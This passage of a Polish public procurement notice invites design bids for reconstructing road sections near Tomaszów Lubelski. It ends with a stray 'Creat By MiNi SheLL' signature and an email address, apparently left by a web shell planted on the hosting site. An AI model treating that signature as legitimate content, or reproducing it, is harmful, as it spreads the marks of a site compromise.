3)zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez Zamawiającego wytycznych dotyczących realizacji projektu, rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z  wynikającymi z umowy  planowanymi świadczeniami,
4) zmiany regulacji prawnych obowiązujących po dniu zawarcia umowy, 
5) zmiany teleadresowe Stron umowy określonych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdptomaszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych, 22-600 Tomaszów Lub. 
 ul. Lwowska 54.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 12:00, miejsce: Zarząd Dróg Powiatowych, 22-600 Tomaszów Lub. 
 ul. Lwowska 54, Sekretariat pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 Przebudowa odcinków dróg powiatowych:
- nr 3521L Tomaszów Lubelski - Ulhówek od km 0+000 do km 1+ 836,00 
- nr 3542L Tomaszów Lubelski - Łaszczówka skrzyżowanie w km 0+000 - 1+675  
- nr 3543L Tomaszów Lubelski - Łaszczówka od km 2+850 do km 3+850, o łącznej długości ok. 4,511km..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy projektowane przedmiotowych odcinków dróg powiatowych:
- klasa techniczna -  Z,
- kategoria obciążenia ruchem - KR1, 
- przebudowa istniejącej nawierzchni,  
- przebudowa i budowa chodników, zatok i miejsc postojowych,
- utwardzenie poboczy,
- odtworzenie systemu odwodnienia, rowy, przepusty, umocnienia,
- kompleksowe oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego,
- przebudowa skrzyżowań i zjazdów, 
- dokumentacja dendrologiczna,
Zakres opracowania i wystąpień wykonawcy związanych z opracowaniem dokumentacji projektowej:
1)Uzyskać   mapę  sytuacyjno - wysokościową  wg potrzeb projektującego.
2) Kosztorysy inwestorskie  - (1 egz.  w wersji papierowej + 1 wersja elektroniczna w formacie PDF.)
3) Szczegółową specyfikację techniczną wykonania i odbioru robót ujętych w przedmiarze- (3 egz.) 
4) Sporządzenie planu bezpieczeństwa i ochrony zdrowia - BIOZ (2 egz.)
5) Przekazać dane niezbędne Zamawiającemu dot. opracowania operatu wodno - prawnego w terminie do 10 sierpnia 2015r.
6) Projekty stałej i tymczasowej organizacji ruchu drogowego/ zatwierdzone przez organ   zarządzający   ruchem /- (3 egz. w wersji papierowej + 1 wersja elektroniczna)
7) Dokumentacja dendrologiczna - (3 egz.)
8) Plan zagospodarowania terenu i przekrój konstrukcyjny należy uzgodnić z Zamawiającym w trakcie realizacji przedmiotu zamówienia.
9) Projekt wykonawczy opracować należy w pięciu egzemplarzach, natomiast przekazanie dokumentacji nastąpi w siedzibie zamawiającego, a sporządzony na tą okoliczność protokół zdawczo - odbiorczy będzie podstawą do wystawienia faktury zamawiającemu za zrealizowane zamówienie.
10) Wykonawca dokumentacji przekaże zmawiającemu całość opracowań w formie elektronicznej na nośnikach cyfrowych. Zarchiwizowana na płycie DVD-R dokumentacja projektowa służąca do opisu przedmiotu zamówienia musi być tożsama z wersją pisemną (papierową). Wykonawca dokumentacji odpowiada za zgodność wersji elektronicznej z opracowaniem pisemnym (papierowym)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 86.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. skrócenie terminu wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 Przebudowa odcinka drogi powiatowej:
- nr 3542L Łaszczówka skrzyżowanie Przeorsk (koniec dz. dr. nr 760) od km 1+675 do km 6+780, długości około 5,105km..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 Przebudowa odcinka drogi powiatowej:
- nr 3542L Łaszczówka skrzyżowanie Przeorsk (koniec dz. dr. nr 760) od km 1+675 do km 6+780, długości około 5,105km.
Elementy projektowane przedmiotowych odcinków dróg powiatowych:
- klasa techniczna -  Z,
- kategoria obciążenia ruchem - KR1, 
- przebudowa istniejącej nawierzchni,  
- przebudowa i budowa chodników, zatok i miejsc postojowych,
- utwardzenie poboczy,
- odtworzenie systemu odwodnienia, rowy, przepusty, umocnienia,
- kompleksowe oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego,
- przebudowa skrzyżowań i zjazdów, 
- dokumentacja dendrologiczna,
Zakres opracowania i wystąpień wykonawcy związanych z opracowaniem dokumentacji projektowej :
1)Uzyskać   mapę  sytuacyjno - wysokościową  wg potrzeb projektującego.
2) Kosztorysy inwestorskie  - (1 egz.  w wersji papierowej + 1 wersja elektroniczna w formacie PDF.)
3) Szczegółową specyfikację techniczną wykonania i odbioru robót ujętych w przedmiarze- (3 egz.) 
4) Sporządzenie planu bezpieczeństwa i ochrony zdrowia - BIOZ (2 egz.)
5) Przekazać dane niezbędne Zamawiającemu dot. opracowania operatu wodno - prawnego w terminie do 10 sierpnia 2015r.
6) Projekty stałej i tymczasowej organizacji ruchu drogowego/ zatwierdzone przez organ   zarządzający   ruchem /- (3 egz. w wersji papierowej + 1 wersja elektroniczna)
7) Dokumentacja dendrologiczna - (3 egz.)
8) Plan zagospodarowania terenu i przekrój konstrukcyjny należy uzgodnić z Zamawiającym w trakcie realizacji przedmiotu zamówienia.
9) Projekt wykonawczy opracować należy w pięciu egzemplarzach, natomiast przekazanie dokumentacji nastąpi w siedzibie zamawiającego, a sporządzony na tą okoliczność protokół zdawczo - odbiorczy będzie podstawą do wystawienia faktury zamawiającemu za zrealizowane zamówienie.
10) Wykonawca dokumentacji przekaże zmawiającemu całość opracowań w formie elektronicznej na nośnikach cyfrowych. Zarchiwizowana na płycie DVD-R dokumentacja projektowa służąca do opisu przedmiotu zamówienia musi być tożsama z wersją pisemną (papierową). Wykonawca dokumentacji odpowiada za zgodność wersji elektronicznej z opracowaniem pisemnym (papierowym)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 86.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. skrócenie terminu wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 Przebudowa odcinków dróg powiatowych: 
- nr 3530L Jarczów - Korhynie od km 3+500 do km 4+030 i od km  4+530 do km 7+915, 
- nr 3530L Przeorsk (koniec dz. dr. nr 760) - Korhynie w km 6+780 - 8+929 o łącznej dł. ok. 6,064km.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy projektowane przedmiotowych odcinków dróg powiatowych:
- klasa techniczna -  Z,
- kategoria obciążenia ruchem - KR1, 
- przebudowa istniejącej nawierzchni,  
- przebudowa i budowa chodników, zatok i miejsc postojowych,
- utwardzenie poboczy,
- odtworzenie systemu odwodnienia, rowy, przepusty, umocnienia,
- kompleksowe oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego,
- przebudowa skrzyżowań i zjazdów, 
- dokumentacja dendrologiczna,
Zakres opracowania i wystąpień wykonawcy związanych z opracowaniem dokumentacji projektowej :
1)Uzyskać   mapę  sytuacyjno - wysokościową  wg potrzeb projektującego. Sporządzić mapę sytuacyjno - wysokościową na brakujący odcinek drogi nr 3530L Przeorsk - Korhynie około 0,500km.
2) Kosztorysy inwestorskie  - (1 egz.  w wersji papierowej + 1 wersja elektroniczna w formacie PDF.)
3) Szczegółową specyfikację techniczną wykonania i odbioru robót ujętych w przedmiarze- (3 egz.) 
4) Sporządzenie planu bezpieczeństwa i ochrony zdrowia - BIOZ (2 egz.)
5) Przekazać dane niezbędne Zamawiającemu dot. opracowania operatu wodno - prawnego w terminie do 10 sierpnia 2015r.
6) Projekty stałej i tymczasowej organizacji ruchu drogowego/ zatwierdzone przez organ   zarządzający   ruchem /- (3 egz. w wersji papierowej + 1 wersja elektroniczna)
7) Dokumentacja dendrologiczna - (3 egz.)
8) Plan zagospodarowania terenu i przekrój konstrukcyjny należy uzgodnić z Zamawiającym w trakcie realizacji przedmiotu zamówienia.
9) Projekt wykonawczy opracować należy w pięciu egzemplarzach, natomiast przekazanie dokumentacji nastąpi w siedzibie zamawiającego, a sporządzony na tą okoliczność protokół zdawczo - odbiorczy będzie podstawą do wystawienia faktury zamawiającemu za zrealizowane zamówienie.
10) Wykonawca dokumentacji przekaże zmawiającemu całość opracowań w formie elektronicznej na nośnikach cyfrowych. Zarchiwizowana na płycie DVD-R dokumentacja projektowa służąca do opisu przedmiotu zamówienia musi być tożsama z wersją pisemną (papierową). Wykonawca dokumentacji odpowiada za zgodność wersji elektronicznej z opracowaniem pisemnym (papierowym)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 86.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. skrócenie terminu wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com